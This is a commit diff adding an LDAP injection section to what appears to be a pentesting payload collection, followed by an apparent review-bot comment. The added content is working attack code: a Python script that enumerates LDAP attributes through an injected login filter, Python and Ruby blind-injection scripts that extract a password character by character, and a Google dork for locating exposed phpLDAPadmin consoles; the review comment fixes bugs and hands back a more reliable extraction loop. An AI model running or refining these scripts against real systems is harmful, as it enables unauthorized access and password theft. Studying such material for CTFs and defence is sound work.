Merge pull request #159 from noraj/patch-1
LDAPi: add scripts and dorks
commit
0b14b12fb4
1 changed files with 84 additions and 1 deletions
|
@ -96,9 +96,92 @@ userPassword:2.5.13.18:=\xx\xx
|
||||||
userPassword:2.5.13.18:=\xx\xx\xx
|
userPassword:2.5.13.18:=\xx\xx\xx
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Scripts
|
||||||
|
|
||||||
|
### Discover valid LDAP fields
|
||||||
|
|
||||||
|
```python
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import string
|
||||||
|
|
||||||
|
fields = []
|
||||||
|
|
||||||
|
url = 'https://URL.com/'
|
||||||
|
|
||||||
|
f = open('dic', 'r') #Open the wordlists of common attributes
|
||||||
|
wordl = f.read().split('\n')
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
for i in wordl:
|
||||||
|
r = requests.post(url, data = {'login':'*)('+str(i)+'=*))\x00', 'password':'bla'}) #Like (&(login=*)(ITER_VAL=*))\x00)(password=bla))
|
||||||
|
if 'TRUE CONDITION' in r.text:
|
||||||
|
fields.append(str(i))
|
||||||
|
|
||||||
|
print(fields)
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
|
### Special Blind LDAP Injection (without "*")
|
||||||
|
|
||||||
|
```python
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import requests, string
|
||||||
|
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
||||||
|
|
||||||
|
flag = ""
|
||||||
|
for i in range(50):
|
||||||
|
print("[i] Looking for number " + str(i))
|
||||||
|
for char in alphabet:
|
||||||
|
r = requests.get("http://ctf.web?action=dir&search=admin*)(password=" + flag + char)
|
||||||
|
if ("TRUE CONDITION" in r.text):
|
||||||
|
flag += char
|
||||||
|
print("[+] Flag: " + flag)
|
||||||
|
break
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
|
```ruby
|
||||||
|
#!/usr/bin/env ruby
|
||||||
|
|
||||||
|
require 'net/http'
|
||||||
|
alphabet = [*'a'..'z', *'A'..'Z', *'0'..'9'] + '_@{}-/()!"$%=^[]:;'.split('')
|
||||||
|
|
||||||
|
flag = ''
|
||||||
|
|
||||||
|
(0..50).each do |i|
|
||||||
|
puts("[i] Looking for number #{i}")
|
||||||
|
alphabet.each do |char|
|
||||||
|
r = Net::HTTP.get(URI("http://ctf.web?action=dir&search=admin*)(password=#{flag}#{char}"))
|
||||||
|
if /TRUE CONDITION/.match?(r)
|
||||||
|
flag += char
|
||||||
|
puts("[+] Flag: #{flag}")
|
||||||
|
break
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
```
|
||||||
|
|
||||||
|
By [noraj](https://github.com/noraj)
|
||||||
|
|
||||||
|
## Google Dorks
|
||||||
|
|
||||||
|
```
|
||||||
|
intitle:"phpLDAPadmin" inurl:cmd.php
|
||||||
|
```
|
||||||
|
|
||||||
|
Ref. [5][5]
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
|
||||||
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
|
||||||
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
|
* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
|
||||||
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
|
* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
|
||||||
|
* \[5] [LDAP Injection - HackTricks][5]
|
||||||
|
|
||||||
|
[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection
|
||||||
|
|
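Review bot: The blind-extraction loop in the second Python script (`for i in range(50)` / `for char in alphabet`) never stops when no character matches — the inner loop falls through without a `break`, so the remaining outer iterations re-send the same ~70 requests against an unchanged `flag` and the run ends with no signal that extraction stalled; the Ruby port at the end of the hunk has the same shape. The query is also built by string concatenation, so alphabet members such as `%`, `=` and `;` go into the URL raw: a `%` that lands in `flag` followed by two later guesses is treated as a percent-escape (or rejected by `requests` as an invalid URL), while `=` and `;` are never encoded; passing the value through `params=` lets `requests` encode it, and since the server decodes the query before building the filter, `*`, `(` and `)` still inject. `'TRUE CONDITION'` must also be a string that does not occur in the error page, because guessing `(` or `)` produces a malformed filter rather than a false match. The prefix semantics of `password=<flag><char>` appear to rely on the application appending `*)` after the injected value (as in the ECW 2018 challenge cited); against a template that does not, append `*` to the value yourself. The rewritten loop below uses `for`/`else` to stop on the first position with no match.
```python
for i in range(50):
    print("[i] Looking for number " + str(i))
    for char in alphabet:
        r = requests.get(
            "http://ctf.web",
            params={"action": "dir", "search": "admin*)(password=" + flag + char},
        )
        if "TRUE CONDITION" in r.text:
            flag += char
            print("[+] Flag: " + flag)
            break
    else:
        # No character matched at this position: stop instead of
        # re-sending the same requests for the remaining iterations.
        break
```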